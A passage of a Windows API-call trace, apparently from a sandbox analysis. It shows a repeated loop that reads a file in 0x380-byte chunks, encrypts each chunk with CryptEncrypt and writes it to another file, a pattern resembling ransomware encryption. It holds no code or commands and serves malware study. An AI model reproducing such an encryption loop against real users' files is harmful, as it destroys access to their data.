lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.935] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.935] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.936] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.936] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.936] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.948] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.948] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.948] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.948] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.948] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.948] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.949] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.950] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.950] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.950] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.950] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.950] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.952] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.952] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.952] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.952] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.952] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.953] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.953] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.953] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.953] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.953] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.954] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.954] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.954] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.954] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.991] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, 